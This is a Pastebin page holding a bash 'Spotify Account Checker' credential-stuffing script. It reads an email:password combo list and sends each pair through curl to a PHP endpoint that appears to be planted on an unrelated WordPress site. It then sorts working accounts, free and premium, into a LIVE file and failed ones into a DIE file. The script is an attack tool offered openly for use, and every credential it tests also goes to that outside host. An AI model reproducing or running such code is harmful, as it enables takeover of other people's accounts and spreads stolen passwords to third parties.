Advertisement
Walker404

[BASH] Spotify Account Checker.

Jan 7th, 2019
112,827
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.39 KB | None | 0 0
  1. #!/bin/bash
  2. # NTB 4 WORLD
  3. #MinorityCode_
  4. waktu=$(date '+%Y-%m-%d %H:%M:%S')
  5. RED="\e[31m"
  6. GREEN="\e[32m"
  7. YELLOW="\e[33m"
  8. CYAN="\e[36m"
  9. LIGHTGREEN="\e[92m"
  10. MARGENTA="\e[35m"
  11. BLUE="\e[34m"
  12. BOLD="\e[1m"
  13. NOCOLOR="\e[0m"
  14. PUTIH='\033[1;37m'
  15. header () {
  16. printf "${RED}
  17. ▄▄▌ ▄▄▄ . ▄▄▄· ▄ •▄ ▄▄· ·▄▄▄▄ ▄▄▄ .
  18. ██• ▀▄.▀·▐█ ▀█ █▌▄▌▪▐█ ▌▪▪ ██▪ ██ ▀▄.▀·
  19. ██▪ ▐▀▀▪▄▄█▀▀█ ▐▀▀▄·██ ▄▄ ▄█▀▄ ▐█· ▐█▌▐▀▀▪▄
  20. ▐█▌▐▌▐█▄▄▌▐█ ▪▐▌▐█.█▌▐███▌▐█▌.▐▌██. ██ ▐█▄▄▌
  21. .▀▀▀ ▀▀▀ ▀ ▀ ·▀ ▀·▀▀▀ ▀█▄▀▪▀▀▀▀▀• ▀▀▀
  22. ${RED}------------------------------------${NOCOLOR}
  23. Checker By NTB4WORLD
  24. ${RED}------------------------------------${NOCOLOR}
  25. "
  26. }
  27. spotify(){
  28. apine=`curl -s "https://www.shirtikvahfrisco.org/wp-content/plugins/androghost/api.php?email=$1&pass=$2"`
  29. cex=$( echo $apine | grep -ic "FREE")
  30. cox=$( echo $apine | grep -ic "PREMIUM")
  31. if [[ $cex == "1" ]]; then
  32. printf "${NOCOLOR}[$i]${GREEN}[LIVE] => $1:$2 | FREE \n"
  33. echo "$1|$2 | $type \n" >> Spotify-LIVE.txt
  34. printf "${NOCOLOR}"
  35. elif [[ $cox == "1" ]]; then
  36. printf "${NOCOLOR}[$i]${GREEN}[LIVE] => $1:$2 | PREMIUM \n"
  37. echo "$1|$2" >> Spotify-LIVE.txt
  38. printf "${NOCOLOR}"
  39. else
  40. printf "${NOCOLOR}[$i]${RED}[DIE] => $1:$2 \n"
  41. echo "$1|$2" >> Spotify-DIE.txt
  42. printf "${NOCOLOR}"
  43. fi
  44. }
  45. header
  46. echo ""
  47. echo "List In This Directory : "
  48. ls
  49. echo "Delimeter list -> email:password "
  50. echo -n "Masukan File List : "
  51. read list
  52. echo "[+] Calculate your empass file"
  53. echo "############################"
  54. totalLines=`grep -c "@" $list`
  55. echo "There are $totalLines of list."
  56. echo "############################"
  57. if [ ! -f $list ]; then
  58. echo "$list No Such File"
  59. exit
  60. fi
  61. x=$(gawk -F: '{ print $1 }' $list)
  62. y=$(gawk -F: '{ print $2 }' $list)
  63. IFS=$'\r\n' GLOBIGNORE='*' command eval 'emailgblg=($x)'
  64. IFS=$'\r\n' GLOBIGNORE='*' command eval 'passwordna=($y)'
  65. for (( i = 0; i < "${#emailgblg[@]}"; i++ )); do
  66. emailna="${emailgblg[$i]}"
  67. kontol="${passwordna[$i]}"
  68.  
  69. spotify $emailna $kontol
  70. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement